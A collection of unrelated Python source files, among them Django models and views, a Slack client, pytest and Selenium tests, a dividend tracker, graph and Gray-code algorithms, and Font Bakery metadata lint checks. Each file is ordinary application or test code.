            # Optional threading: attach to a parent review when one is given.
            if request.POST.get("parent", None):
                form.parent_id = int(request.POST.get("parent"))
            form.movie = movie
            form.save()
        # Invalid forms are silently dropped; always return to the movie page.
        return redirect(movie.get_absolute_url())
|
import os
from dotenv import load_dotenv
from slack_sdk import WebClient
from slack_sdk.errors import SlackApiError
from src.Config import Config
class Slack(Config):
    """Thin Slack client wrapper that posts images to the configured channel."""
    # Populated by set_token() during __init__.
    token = None
    client = None
    def __init__(self):
        super().__init__()
        self.set_token()
    def set_token(self):
        """Load SLACK_TOKEN from the environment (reading .env when present)
        and build the API client."""
        if os.path.exists(".env"):
            load_dotenv(verbose=True)
        self.token = os.environ["SLACK_TOKEN"]
        self.client = WebClient(token=self.token)
    def post_image(self, file):
        """Upload ``file`` to the configured Slack channel.

        Returns True on success, False on any Slack API failure.
        """
        channel_name = self.SLACK_CHANNEL_NAME
        try:
            response = self.client.files_upload(
                channels=channel_name,
                file=file,
            )
            if not response["ok"]:
                # BUG FIX: SlackApiError requires (message, response); the
                # previous one-argument call raised TypeError, which escaped
                # the except clause below instead of returning False.
                raise SlackApiError("슬랙 전송 실패", response)
            return True
        except SlackApiError:
            return False
|
# -*- coding: utf-8 -*-
# flake8: noqa
# Generated by Django 1.11 on 2017-05-06 15:43
from __future__ import unicode_literals
import ckeditor_uploader.fields
from django.db import migrations, models
import django.db.models.deletion
import image_cropping.fields
import snippets.utils.datetime
class Migration(migrations.Migration):
    """Auto-generated initial migration for the knowledge-base app: creates
    Article, ArticleCategory and ArticleSection (with ru/en/fr translated
    fields) and links articles to their categories."""
    initial = True
    dependencies = [
        ('core', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Article',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
                ('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
                ('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
                ('title', models.CharField(db_index=True, max_length=255, verbose_name='Заголовок')),
                ('title_ru', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('title_en', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('title_fr', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('slug', models.SlugField(help_text='Разрешены только латинские символы, цифры, символ подчеркивания и дефис (минус)', max_length=150, unique=True, verbose_name='Алиас')),
                ('publish_date', models.DateTimeField(db_index=True, default=snippets.utils.datetime.utcnow, help_text='Можно задать на будущее', verbose_name='Дата публикации')),
                ('image', image_cropping.fields.ImageCropField(blank=True, max_length=255, null=True, upload_to='news', verbose_name='Изображение')),
                ('thumb_list', image_cropping.fields.ImageRatioField('image', '200x400', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='Эскиз в списке')),
                ('excerpt', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
                ('excerpt_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
                ('excerpt_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
                ('excerpt_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
                ('body', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', verbose_name='Контент')),
                ('body_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
                ('body_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
                ('body_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
            ],
            options={
                'verbose_name': 'Статья',
                'verbose_name_plural': 'База знаний',
            },
        ),
        migrations.CreateModel(
            name='ArticleCategory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
                ('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
                ('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
                ('title', models.CharField(db_index=True, max_length=255, verbose_name='Заголовок')),
                ('title_ru', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('title_en', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('title_fr', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
                ('slug', models.SlugField(help_text='Разрешены только латинские символы, цифры, символ подчеркивания и дефис (минус)', max_length=150, unique=True, verbose_name='Алиас')),
            ],
            options={
                'verbose_name': 'Категория базы знаний',
                'verbose_name_plural': 'Категории базы знаний',
            },
        ),
        migrations.CreateModel(
            name='ArticleSection',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
                ('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
                ('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
                ('title', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
                ('title_ru', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
                ('title_en', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
                ('title_fr', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
                ('body', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', verbose_name='Контент')),
                ('body_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
                ('body_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
                ('body_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
                ('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sections', to='knowledge.Article', verbose_name='Статья')),
                ('gallery', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='article_sections', to='core.Gallery', verbose_name='Галерея фотографий')),
            ],
            options={
                'verbose_name': 'Секция статьи',
                'verbose_name_plural': 'Секции статьи',
            },
        ),
        migrations.AddField(
            model_name='article',
            name='categories',
            field=models.ManyToManyField(blank=True, related_name='articles', to='knowledge.ArticleCategory', verbose_name='Категории базы знаний'),
        ),
    ]
|
import pytest
from onegov.ticket import Handler
from onegov.ticket.errors import DuplicateHandlerError
def test_invalid_handler_code(handlers):
    """Handler codes must be three uppercase letters; bad codes are rejected."""
    # The registry may already hold entries from other tests, so compare
    # against a snapshot instead of asserting emptiness.
    size_before = len(handlers.registry)
    for bad_code in ('abc', 'AB'):
        with pytest.raises(AssertionError):
            handlers.register(bad_code, Handler)
    assert len(handlers.registry) == size_before
def test_register_handler(handlers):
    """Registered handlers resolve by code; re-registering a code raises."""

    class FooHandler(Handler):
        pass

    class BarHandler(Handler):
        pass

    for code, cls in (('FOO', FooHandler), ('BAR', BarHandler)):
        handlers.register(code, cls)

    assert handlers.get('FOO') is FooHandler
    assert handlers.get('BAR') is BarHandler

    with pytest.raises(DuplicateHandlerError):
        handlers.register('FOO', BarHandler)
|
# Greedy solver: pick K of N items (each with kind t and value d) to
# maximize sum(values) + (number of distinct kinds)**2.
# NOTE(review): matches the AtCoder "sushi"-style problem pattern — confirm.
N, K = map( int, input().split())
T = [(0,0)]*N
for i in range(N):
    t, d = map( int, input().split())
    T[i] = (d,t)
# Tuples are (d, t), so this sorts by value descending.
T.sort( key= None, reverse = True)
C = T[:K]   # initially chosen: the K most valuable items
AC = T[K:]  # remaining candidates, still value-descending
kiso = 0    # running sum of chosen values
s = 0       # number of distinct kinds among chosen items
S = [0]*(N+1)  # S[t] = count of chosen items of kind t
for i in range(K):
    d, t = T[i]
    kiso += d
    if S[t] == 0:
        S[t] = 1
        s += 1
    else:
        S[t] += 1
ans = kiso + s**2
# Improvement phase: walk chosen items cheapest-first; whenever a chosen
# item's kind is duplicated, swap it for the best leftover of an unseen
# kind — losing value d but gaining a distinct kind (raises s**2).
C.sort()
r = 0
for i in range(K):
    d, t = C[i]
    if S[t] >= 2:
        while r < N-K:
            if S[ AC[r][1]] == 0:
                S[t] -= 1
                S[ AC[r][1]] += 1
                s += 1
                kiso -= d
                kiso += AC[r][0]
                r += 1
                break
            r += 1
    # Track the best objective seen after each candidate swap.
    ans = max( ans, kiso + s**2)
print( ans)
|
from atm_card import ATMCard
class Customer:
    """A bank customer who owns a single ATM card.

    The card (an ``ATMCard``) stores the PIN and balance; this class is a
    thin facade over it.
    """

    def __init__(self, id, cust_pin=1234, cust_balance=10000):
        # `id` shadows the builtin, but the parameter name is part of the
        # public interface, so it is kept.
        self.__id = id
        self.__atm = ATMCard(cust_pin, cust_balance)

    @property
    def id(self):
        """Customer identifier (read-only)."""
        # Fix: the old code used an empty @property plus a separate
        # @id.getter re-registration — one plain property is equivalent.
        return self.__id

    @property
    def cust_pin(self):
        # Write-only in practice: reading yields None, matching the
        # original contract (the PIN is never exposed here).
        return None

    @cust_pin.setter
    def cust_pin(self, new_pin):
        """Change the PIN stored on the card."""
        self.__atm.default_pin = new_pin

    def check_balance(self):
        """Return the current card balance."""
        return self.__atm.default_balance

    def check_pin(self, input_pin):
        """Return True iff ``input_pin`` matches the card's PIN."""
        # Fix: return the comparison directly instead of if/else True/False.
        return self.__atm.default_pin == input_pin

    def withdraw_balance(self, nominal):
        # NOTE(review): no overdraft check — balance may go negative;
        # kept as-is to preserve the original behavior.
        self.__atm.default_balance -= nominal

    def deposit_balance(self, nominal):
        """Add ``nominal`` to the card balance."""
        self.__atm.default_balance += nominal
"""
------------------------------------
@Time : 2020/9/15 14:46
@Auth : chai
@File : test_2_homePageCase.py
@IDE : PyCharm
@Motto:
------------------------------------
"""
import time
import random
import pytest
from Page import BasePage
from data.login_data import LoginData
from Page.BasePage import BasePage
from conftest import _capture_screenshot
from data.recommend_data import RecommendData
from Page.PageObject import RecommendPage
@pytest.mark.Test
class TestRecommendPage(object):
    """Recommend page: each dropdown must show the expected option text."""
    recommendPage_data = RecommendData
    # (option index, expected text) pairs consumed by parametrize below.
    recommendPage_data_select1 = recommendPage_data.select1_data  # parametrization data
    recommendPage_data_select2 = recommendPage_data.select2_data  # parametrization data
    recommendPage_data_select3 = recommendPage_data.select3_data  # parametrization data
    recommendPage_data_select4 = recommendPage_data.select4_data  # parametrization data
    def test_recommend0(self, login):
        # login fixture: index 1 appears to be the home page object —
        # TODO confirm against conftest.
        home_page = login[1]
        time.sleep(7)
        home_page.select_menu(menu="recommend")
    @pytest.mark.parametrize('value,expect', recommendPage_data_select1)
    def test_recommend1(self, login,value,expect):
        # home_page = login[1]
        # time.sleep(2)
        recommend_page = login[2]
        # home_page.select_menu(menu="recommend")
        #recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
        # Pick the option by index, then read the select's text back and
        # compare the chosen entry against the expected label.
        recommend_page.select_option(recommend_page.select1[1],value,"index")
        actual_all = recommend_page.get_element_text(recommend_page.select1[0],recommend_page.select1[1]).split('\n')
        actual = actual_all[int(value)].strip()
        assert actual == expect, "断言成功"
    @pytest.mark.parametrize('value,expect', recommendPage_data_select2)
    def test_recommend2(self, login, value, expect):
        recommend_page = login[2]
        # recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
        recommend_page.select_option(recommend_page.select2[1], value, "index")
        actual_all = recommend_page.get_element_text(recommend_page.select2[0], recommend_page.select2[1]).split('\n')
        actual = actual_all[int(value)].strip()
        assert actual == expect, "断言成功"
    @pytest.mark.parametrize('value,expect', recommendPage_data_select3)
    def test_recommend3(self, login,value,expect):
        recommend_page = login[2]
        #recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
        recommend_page.select_option(recommend_page.select3[1],value,"index")
        actual_all = recommend_page.get_element_text(recommend_page.select3[0],recommend_page.select3[1]).split('\n')
        actual = actual_all[int(value)].strip()
        assert actual == expect, "断言成功"
    @pytest.mark.parametrize('value,expect', recommendPage_data_select4)
    def test_recommend4(self, login, value, expect):
        recommend_page = login[2]
        # recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
        recommend_page.select_option(recommend_page.select4[1], value, "index")
        actual_all = recommend_page.get_element_text(recommend_page.select4[0], recommend_page.select4[1]).split('\n')
        actual = actual_all[int(value)].strip()
        assert actual == expect, "断言成功"
@pytest.mark.Test
class TestRecommendPage_flow(object):
    """End-to-end flow: fill the recommend form, submit, open a result."""
    def test_recommend_flow(self, login):
        home_page = login[1]
        time.sleep(7)
        home_page.select_menu(menu="recommend")
        recommend_page = login[2]
        # Step 1: the four dropdowns (random indices within each range).
        recommend_page.select_option(recommend_page.select1[1], random.randint(0,3), "index")
        recommend_page.select_option(recommend_page.select2[1], 0, "index")
        recommend_page.select_option(recommend_page.select3[1], random.randint(0,5), "index")
        recommend_page.select_option(recommend_page.select4[1], random.randint(0,2), "index")
        recommend_page.click("xpath", recommend_page.nextBtn[1])
        time.sleep(1)
        # Step 2: on the next screen, always pick the second option of
        # each group, then submit.
        recommend_page.click("xpath", recommend_page.select5_opt2[1])
        recommend_page.click("xpath", recommend_page.select6_opt2[1])
        recommend_page.click("xpath", recommend_page.select7_opt2[1])
        recommend_page.click("xpath", recommend_page.select8_opt2[1])
        recommend_page.click("xpath", recommend_page.select9_opt2[1])
        recommend_page.click("xpath", recommend_page.loginBtn[1])
        # NOTE(review): "Sevice" looks like a typo for "Service" — confirm
        # against the actual page text before changing the assertion.
        assert "Sevice Recommend" in recommend_page.driver.page_source
        recommend_page.click("xpath", "/html/body/div[4]/div/ul/li[1]/div[2]/div[2]/h4/a")
        time.sleep(2)
        assert "立 刻 购 买" in recommend_page.driver.page_source
    # def test_recommend(self, login):
    #     home_page = login[1]
    #     recommend_page = login[2]
    #     print("home_page",home_page)
    #     time.sleep(7)
    #     home_page.select_menu(menu="recommend")
    #     #home_page.option_value_check("//*[@id='business_types']", "option", "製造業, 卸売業, 小売業, IT, ")
    #     # recommend_page.click_select1_btn()
    #     # recommend_page.click_select1_opt(2,"index")
    #     recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
    #     recommend_page.select_option(recommend_page.select1[1],2,"index")
    #     #home_page.select_option(locator="//*[@id='business_types']", value=2, type="index")
    #     time.sleep(2)
    #     #expect = recommend_page.get_element_text("xpath","//*[@id='business_types']")
    #     print("recommend_page.select1",recommend_page.select1,recommend_page.select1[1])
    #     expect = recommend_page.get_element_text(recommend_page.select1[0],recommend_page.select1[1])
    #     assert "小売業" in expect, "路径跳转正确, 断言成功"
    #     home_page.select_option(locator="//*[@id='position']", value=0, type="index")
    #     expect = home_page.get_element_text("xpath", "//*[@id='position']")
    #     assert "経営者" in expect, "路径跳转正确, 断言成功"
    #     home_page.select_option(locator="//*[@id='scale']", value=1, type="index")
    #     expect = home_page.get_element_text("xpath", "//*[@id='scale']")
    #     assert "10~20人未満" in "10~20人未満", "路径跳转正确, 断言成功"
    #     time.sleep(5)
    #     #home_page.get_element(self.Button_Search).click()
# Direct-execution entry point.
# NOTE(review): the file header says test_2_homePageCase.py but pytest is
# pointed at 'test_3_recommendPageCase.py' — confirm this matches the
# actual file name on disk.
if __name__ == "__main__":
    pytest.main(['-v', 'test_3_recommendPageCase.py'])
from unittest import TestCase
import unittest
import sys
sys.path.append('../')
from leetCodeUtil import TreeNode
from convert_sorted_array_binarytree import Solution
class TestSolution(TestCase):
    """BFS-order checks for Solution.sortedArrayToBST."""

    def test_convertCase1(self):
        ## Test case 1: balanced BST from three sorted values.
        root = Solution().sortedArrayToBST([1, 2, 3])
        self.assertListEqual(list(root.getBFS(root)), [2, 1, 3])

    def test_convertCase2(self):
        ## Test case 2: five sorted values; check BFS order of the tree.
        root = Solution().sortedArrayToBST([-10, -3, 0, 5, 9])
        self.assertListEqual(list(root.getBFS(root)), [0, -3, 9, -10, 5])
# Standard unittest entry point for direct execution.
if __name__ == '__main__':
    unittest.main()
import os
import time
import datetime
import pandas as pd
import requests
from key import fcs_key
# TODO: dividend tracker pulling newest update from database
# TODO: appending newest update to GSheets (online database)
def check_make_dir() -> str:
    """Ensure the 'Overall-Dividends' folder (for the CSV files) exists.

    :return: path of the directory under the current working directory
    """
    directory = os.getcwd() + "\\Overall-Dividends"
    try:
        os.mkdir(directory)
    except FileExistsError:
        pass
    return directory
def check_file(filename) -> bool:
    """Check whether ``filename`` already exists in the dividends directory.

    :param filename: bare CSV file name, e.g. 'DBS_dividends.csv'
    :return: True if the file exists in the directory
    """
    # Bug fix: the path previously ignored the `filename` parameter, so the
    # check never looked at the file actually being asked about. Also return
    # the boolean directly instead of an if/else True/False.
    return os.path.exists(f"{check_make_dir()}\\{filename}")
def last_tracked_date() -> dict:
    """Return the last tracked dividend-payout date for each stock label.

    Currently a placeholder: every label maps to the epoch timestamp of
    100 days before today.

    :return: dict mapping stock label -> epoch timestamp
    """
    # TODO: update last_tracked_date dynamically after
    # push_to_sheets.get_new_data() has run.
    return {label: get_epoch(-100) for label in key_stock_labels()}
def key_stock_labels() -> dict:
    """Portfolio definition keyed by SGX ticker symbol.

    Each value holds the display name, purchase date (epoch string),
    units held, and trading currency.

    :return: dict of stock label -> holding details
    """
    holdings = {
        'ES3': {'name': 'STI_ETF', 'bought': '1591228800', 'units': 600.0, 'currency': 'SGD'},
        'BUOU': {'name': 'Fraser_L&C_Trust', 'bought': '1591228800', 'units': 2759.0, 'currency': 'SGD'},
        'D05': {'name': 'DBS', 'bought': '1589328000', 'units': 100.0, 'currency': 'SGD'},
        'BTOU': {'name': 'Manulife_USD_REIT', 'bought': '1508198400', 'units': 3500.0, 'currency': 'USD'},
        'B73': {'name': 'Global_Investments', 'bought': '1494806400', 'units': 10821, 'currency': 'SGD'},
        '558': {'name': 'UMS', 'bought': '1520812800', 'units': 1500, 'currency': 'SGD'},
        'BN2': {'name': 'Valuetronics', 'bought': '1549843200', 'units': 4000, 'currency': 'HKD'},
    }
    return holdings
def get_date(epoch_date: int) -> datetime.date:
    """Convert an epoch timestamp to the corresponding calendar date.

    :param epoch_date: seconds since the Unix epoch (interpreted in local time)
    :return: the matching ``datetime.date``
    """
    # Bug fix: the old code called .now() on the converted value, which
    # discarded `epoch_date` entirely and always returned today's date.
    return datetime.datetime.fromtimestamp(epoch_date).date()
def get_epoch(day_diff: int) -> int:
    """Epoch timestamp of local midnight, ``day_diff`` days from today.

    :param day_diff: day offset relative to today (negative = in the past)
    :return: epoch timestamp as an int
    """
    target = datetime.date.today() + datetime.timedelta(days=day_diff)
    # Midnight of the target day, in local time.
    midnight = datetime.datetime.combine(target, datetime.time())
    return int(time.mktime(midnight.timetuple()))
def download_write_csv() -> None:
    """Download dividend-history CSVs from Yahoo Finance for each holding.

    Files already present in the dividends directory are left untouched;
    only missing ones are fetched and written.
    """
    # TODO: always overwrite downloads to refresh and obtain new data
    stock = key_stock_labels()
    epoch_date = get_epoch(0)
    for k, v in stock.items():
        filename = f"{v['name']}_dividends.csv"
        # Bug fix: paths/messages previously interpolated a broken
        # placeholder instead of the actual file name.
        if check_file(filename):
            print(f"{filename} already exists")
            continue
        # Skip the HTTP request entirely when the file is already cached
        # (the original downloaded first and then discarded the data).
        url = f"https://query1.finance.yahoo.com/v7/finance/download/{k}.SI?period1={v['bought']}&period2={epoch_date}&interval=1d&events=div"
        response = requests.get(url)
        with open(f"{check_make_dir()}\\{filename}", 'wb') as csv_file:
            csv_file.write(response.content)
        print(f"Published {check_make_dir()}\\{filename}")
def currency_converter(foreign_currency: list) -> dict:
    """Fetch FX rates to SGD for each given currency via FCSAPI.

    :param foreign_currency: currency codes to convert, e.g. ['USD', 'HKD']
    :return: dict mapping currency code -> SGD value of one unit
    """
    base = 'SGD'
    rates = {}
    for code in foreign_currency:
        url = f"https://fcsapi.com/api-v2/forex/converter?symbol={code}/{base}&amount=1&access_key={fcs_key}"
        payload = requests.get(url).json()
        rates[code] = float(payload['response']['price_1x_SGD'])
    return rates
def calculate_dividend_received() -> None:
    """Compute total SGD dividends per payout row and write back each CSV.

    For every holding, reads its ``<name>_dividends.csv``, adds (once) a
    label column and a 'Total Dividends/SGD' column, fills in any rows not
    yet computed (units * per-unit dividend, converted to SGD when the
    holding trades in a foreign currency), and overwrites the CSV.
    """
    stock = key_stock_labels()
    # Collect the non-SGD currencies so we only hit the FX API for those.
    # (Duplicates are harmless: the converter returns a dict keyed by code.)
    foreign_currency = []
    for k, v in stock.items():
        if not v['currency'] == 'SGD':
            foreign_currency.append(v['currency'])
    # creates dict of currency conversions to be used later
    currency_conversions = currency_converter(foreign_currency)
    for k, v in stock.items():
        filename = f"{check_make_dir()}\\{v['name']}_dividends.csv"
        df = pd.read_csv(filename)
        if not v['name'] in df: # Labels each row with stock name for future analysis
            df.insert(loc=0, column=v['name'], value=v['name'])
        if not 'Total Dividends/SGD' in df: # checks if Total Dividends/SGD column already in DataFrame
            df['Total Dividends/SGD'] = 0 # creates column
        for i in range(len(df.index)):
            # Calculate total dividends if not calculated
            # (rows already filled on a previous run are skipped).
            if df.at[i, 'Total Dividends/SGD'] == 0:
                if v['currency'] == 'SGD':
                    total_div = df.loc[i, 'Dividends'] * v['units']
                    df.loc[i, 'Total Dividends/SGD'] = total_div
                else: # do conversion to SGD
                    total_div = df.loc[i, 'Dividends'] * v['units']
                    df.loc[i, 'Total Dividends/SGD'] = total_div * (currency_conversions[v['currency']])
        # Persist the augmented table in place.
        df.to_csv(filename, index=False)
|
# %% Import Libraries
from utils import edges, show_graph, Graph, get_input, sort_edge, is_connected
from copy import deepcopy
# %% Algorithm
def kruskal(graph):
    """
    Find a minimum spanning tree of a graph.

    NOTE(review): despite the name, this implements the reverse-delete
    strategy — walk the sorted edges, remove each one, and re-add it only
    if the removal disconnects the graph (assumes `sort_edge` returns
    edges heaviest-first; confirm in utils). Kruskal proper grows the
    tree from the lightest edges instead.

    :param graph: A list of nodes (a graph)
    :return: Spanning tree of a graph as a list of nodes (a graph)
    """
    # NOTE: this local shadows the `edges` function imported from utils.
    edges = sort_edge(graph)
    # Work on a copy so the caller's graph is untouched.
    graph = deepcopy(graph)
    for e in edges:
        s, d, w = e
        des_node = [n for n in graph if n.idx == d][0]
        for n in graph:
            if n.idx == s:
                n.remove_adjacent(d)
                print(s, '->',d,':',w,' Removed!')
                break
        if not is_connected(graph):
            # Removal broke connectivity: this edge is essential, restore it.
            for n in graph:
                if n.idx == s:
                    n.add_adjacent(des_node, w)
                    print(s, '->',d,':',w,' Added!')
    return graph
# %% Test
# get_input() reads the edge list from stdin; the sample below matches
# the image referenced in the repository root.
g = get_input()
g = kruskal(g)
edges(g, p=True)
# this is sample input.
# Look at the image in the root directory please.
# 0 1 4
# 0 7 8
# 1 2 8
# 1 7 11
# 2 3 7
# 2 8 2
# 7 8 7
# 7 6 1
# 8 6 6
# 6 5 2
# 2 5 4
# 3 5 14
# 3 4 9
# 5 4 10
# 0
def flip_num(my_nu):
    """Return the complementary bit character: '0' -> '1', anything else -> '0'."""
    if my_nu == '0':
        return '1'
    return '0'
def gray_to_binary(gray):
    """Convert a Gray-code bit string to its plain binary representation.

    binary[0] = gray[0]; each later binary bit equals the previous binary
    bit when the Gray bit is '0' and is flipped when it is '1'.

    :param gray: string of '0'/'1' characters (may be empty)
    :return: binary string of the same length
    """
    if not gray:
        # Edge-case fix: the original indexed gray[0] and raised
        # IndexError on an empty string.
        return ""
    bits = [gray[0]]
    for i in range(1, len(gray)):
        if gray[i] == '0':
            bits.append(bits[i - 1])
        else:
            bits.append('1' if bits[i - 1] == '0' else '0')
    # Build the result in one pass instead of quadratic string +=.
    return "".join(bits)
# Demo: decode a sample Gray code and print the matching binary string.
gray_code = "01101001"
print("The gray code is :")
print(gray_code)
print("Binary code of", gray_code, "is", gray_to_binary(gray_code))
|
# coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.
import os
from bakery_lint.base import BakeryTestCase as TestCase, tags
from bakery_lint.metadata import Metadata
from bakery_cli.ttfont import Font
class TestFontOnDiskFamilyEqualToMetadataJSON(TestCase):
    """Lint check: each TTF's internal family name must match METADATA.json."""
    name = __name__
    targets = ['metadata']
    tool = 'lint'
    def read_metadata_contents(self):
        # Raw METADATA.json text for the family under test.
        return open(self.operator.path).read()
    @tags('required',)
    def test_font_on_disk_family_equal_in_metadata_json(self):
        """ Font on disk and in METADATA.json have the same family name """
        contents = self.read_metadata_contents()
        metadata = Metadata.get_family_metadata(contents)
        unmatched_fonts = []
        for font_metadata in metadata.fonts:
            try:
                font = Font.get_ttfont_from_metadata(self.operator.path,
                                                     font_metadata)
            except IOError:
                # Font file missing on disk: skip here, other checks report it.
                continue
            if font.familyname != font_metadata.name:
                unmatched_fonts.append(font_metadata.filename)
        if unmatched_fonts:
            msg = 'Unmatched family name are in fonts: {}'
            self.fail(msg.format(', '.join(unmatched_fonts)))
class TestPostScriptNameInMetadataEqualFontOnDisk(TestCase):
    """Verify METADATA.json postScriptName entries against the TTF files."""

    name = __name__
    targets = ['metadata']
    tool = 'lint'

    def read_metadata_contents(self):
        # Raw METADATA.json text for the family under test.
        return open(self.operator.path).read()

    @tags('required')
    def test_postscriptname_in_metadata_equal_to_font_on_disk(self):
        """ Checks METADATA.json 'postScriptName' matches TTF 'postScriptName' """
        metadata = Metadata.get_family_metadata(self.read_metadata_contents())
        for font_metadata in metadata.fonts:
            try:
                font = Font.get_ttfont_from_metadata(
                    self.operator.path, font_metadata)
            except IOError:
                # Font file missing on disk: another check reports that.
                continue
            if font.post_script_name != font_metadata.post_script_name:
                msg = 'In METADATA postScriptName="{0}", but in TTF "{1}"'
                self.fail(msg.format(font.post_script_name,
                                     font_metadata.post_script_name))
class CheckMetadataAgreements(TestCase):
    """Internal-consistency checks on METADATA.json and against the TTFs."""
    name = __name__
    targets = ['metadata']
    tool = 'lint'
    def setUp(self):
        # Parse the family metadata once; every test below reads it.
        contents = self.read_metadata_contents()
        self.metadata = Metadata.get_family_metadata(contents)
    def read_metadata_contents(self):
        # Raw METADATA.json text for the family under test.
        return open(self.operator.path).read()
    def test_metadata_family_values_are_all_the_same(self):
        """ Check that METADATA family values are all the same """
        name = ''
        for font_metadata in self.metadata.fonts:
            if name and font_metadata.name != name:
                self.fail('Family name in metadata fonts items not the same')
            name = font_metadata.name
    def test_metadata_font_have_regular(self):
        """ According to GWF standards the font should have a Regular style. """
        # this tests will appear in each font
        have = False
        for i in self.metadata.fonts:
            if i.weight == 400 and i.style == 'normal':
                have = True
        self.assertTrue(have)
    @tags('required')
    def test_metadata_regular_is_400(self):
        """ Regular should be 400 """
        have = False
        for i in self.metadata.fonts:
            if i.filename.endswith('Regular.ttf') and i.weight == 400:
                have = True
        if not have:
            self.fail(('METADATA.json does not contain Regular font. At least'
                       ' one font must be Regular and its weight must be 400'))
    def test_metadata_regular_is_normal(self):
        """ Usually Regular should be normal style """
        have = False
        for x in self.metadata.fonts:
            if x.full_name.endswith('Regular') and x.style == 'normal':
                have = True
        self.assertTrue(have)
    @tags('required')
    def test_metadata_filename_matches_postscriptname(self):
        """ METADATA.json `filename` matches `postScriptName` """
        import re
        # Compare with all non-word characters stripped (and the file
        # extension removed from the filename).
        regex = re.compile(r'\W')
        for x in self.metadata.fonts:
            post_script_name = regex.sub('', x.post_script_name)
            filename = regex.sub('', os.path.splitext(x.filename)[0])
            if filename != post_script_name:
                msg = '"{0}" does not match "{1}"'
                self.fail(msg.format(x.filename, x.post_script_name))
    @tags('required')
    def test_metadata_fullname_matches_postScriptName(self):
        """ METADATA.json `fullName` matches `postScriptName` """
        import re
        # Same normalization as the filename check above.
        regex = re.compile(r'\W')
        for x in self.metadata.fonts:
            post_script_name = regex.sub('', x.post_script_name)
            fullname = regex.sub('', x.full_name)
            if fullname != post_script_name:
                msg = '"{0}" does not match "{1}"'
                self.fail(msg.format(x.full_name, x.post_script_name))
    def test_metadata_fullname_is_equal_to_internal_font_fullname(self):
        """ METADATA.json 'fullname' value matches internal 'fullname' """
        for font_metadata in self.metadata.fonts:
            font = Font.get_ttfont_from_metadata(self.operator.path, font_metadata)
            self.assertEqual(font.fullname, font_metadata.full_name)
    def test_font_name_matches_family(self):
        """ METADATA.json fonts 'name' property should be
        same as font familyname """
        for font_metadata in self.metadata.fonts:
            font = Font.get_ttfont_from_metadata(self.operator.path, font_metadata)
            if font_metadata.name != font.familyname:
                msg = '"fonts.name" property is not the same as TTF familyname'
                self.fail(msg)
